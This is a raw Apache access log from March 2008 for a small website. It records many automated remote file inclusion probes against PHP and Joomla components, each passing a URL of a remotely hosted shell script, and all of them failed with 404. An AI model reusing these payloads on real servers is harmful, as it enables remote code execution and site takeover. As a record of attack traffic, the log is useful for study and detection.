80.67.21.215 - - [09/Mar/2008:18:08:53 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://theplayboyinvest.com/0/s/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.152.127.174 - - [09/Mar/2008:18:09:08 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
62.152.127.174 - - [09/Mar/2008:18:09:08 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
72.36.193.74 - - [09/Mar/2008:18:09:26 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:09:41 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:09:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:09:42 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:09:53 -0700] "GET /logs/access.log/head.php?path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:09:53 -0700] "GET /head.php?path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:09:53 -0700] "GET /logs/head.php?path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:10:54 -0700] "GET /logs/access_080107.log/markdown.php?ccms_library_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:10:54 -0700] "GET /markdown.php?ccms_library_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:10:55 -0700] "GET /logs/markdown.php?ccms_library_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.238.199.66 - - [09/Mar/2008:18:11:01 -0700] "GET /logs/access_071231.log/markdown.php?ccms_library_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:11:26 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:11:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:11:27 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.193.127.94 - - [09/Mar/2008:18:11:39 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
81.193.127.94 - - [09/Mar/2008:18:11:39 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:12:55 -0700] "GET /PHPDJ_v05/dj/djpage.php?page=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:12:58 -0700] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
82.99.30.55 - - [09/Mar/2008:18:14:10 -0700] "GET /logs/?S=A HTTP/1.0" 200 4211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:14:16 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:15:03 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.127.86.119 - - [09/Mar/2008:18:15:13 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.127.86.119 - - [09/Mar/2008:18:15:13 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.127.86.119 - - [09/Mar/2008:18:15:15 -0700] "GET /logs/%3Cwbr%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:18:16:13 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:18:16:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:18:16:17 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:18:16:17 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:18:17:24 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:30 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:30 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:31 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:35 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:35 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:18:36 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
71.205.109.188 - - [09/Mar/2008:18:20:21 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 227130 "-" "aelemnd ddgkoooqnuxr7fq" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:22:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:22:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:18:23:57 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:18:23:57 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:25:18 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:18:25:18 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
82.99.30.37 - - [09/Mar/2008:18:25:43 -0700] "GET /logs/?D=A HTTP/1.0" 200 4211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:26:30 -0700] "GET /logs/access_071231.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:26:30 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:26:30 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:26:59 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:26:59 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:26:59 -0700] "GET /logs/%3Cwbr%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.135.210.75 - - [09/Mar/2008:18:27:20 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.21.215 - - [09/Mar/2008:18:27:46 -0700] "GET /logs/access_071217.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://theplayboyinvest.com/0/s/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.21.215 - - [09/Mar/2008:18:27:46 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://theplayboyinvest.com/0/s/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [09/Mar/2008:18:27:46 -0700] "GET /logs/access_080114.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.21.215 - - [09/Mar/2008:18:27:46 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://theplayboyinvest.com/0/s/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:27:52 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:27:52 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.245.34.34 - - [09/Mar/2008:18:27:52 -0700] "GET /logs/%3Cwbr%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
63.195.191.15 - - [09/Mar/2008:18:28:44 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:28:54 -0700] "GET ///components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:28:54 -0700] "GET /logs///components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
77.74.195.98 - - [09/Mar/2008:18:29:14 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:29:18 -0700] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:29:24 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
77.74.195.98 - - [09/Mar/2008:18:30:18 -0700] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
204.185.158.220 - - [09/Mar/2008:18:30:25 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.74.195.98 - - [09/Mar/2008:18:30:57 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.67.161.57 - - [09/Mar/2008:18:31:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
65.67.161.57 - - [09/Mar/2008:18:31:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
77.74.195.98 - - [09/Mar/2008:18:31:38 -0700] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:35:17 -0700] "GET /logs/access_071231.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
212.179.41.165 - - [09/Mar/2008:18:37:17 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.179.41.165 - - [09/Mar/2008:18:37:17 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.179.41.165 - - [09/Mar/2008:18:37:18 -0700] "GET /logs/%3Cwbr%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.179.41.165 - - [09/Mar/2008:18:38:35 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:38:39 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:38:39 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
82.99.30.6 - - [09/Mar/2008:18:40:33 -0700] "GET /associationsMumsTots.html HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
71.245.244.157 - - [09/Mar/2008:18:41:50 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://angel.yum.pl/joomla/images/borda10.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:41:56 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:41:56 -0700] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:41:56 -0700] "GET /logs/%3Cwbr%20/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:31 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:31 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:42:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
211.99.2.85 - - [09/Mar/2008:18:42:39 -0700] "GET /logs/aedating4CMS.php?dir[inc]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:43:31 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:43:32 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:43:32 -0700] "GET /logs/%3Cwbr%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.193.72.245 - - [09/Mar/2008:18:44:34 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
62.193.72.245 - - [09/Mar/2008:18:44:34 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:45:31 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
204.15.10.33 - - [09/Mar/2008:18:45:32 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:48:07 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:18:48:08 -0700] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
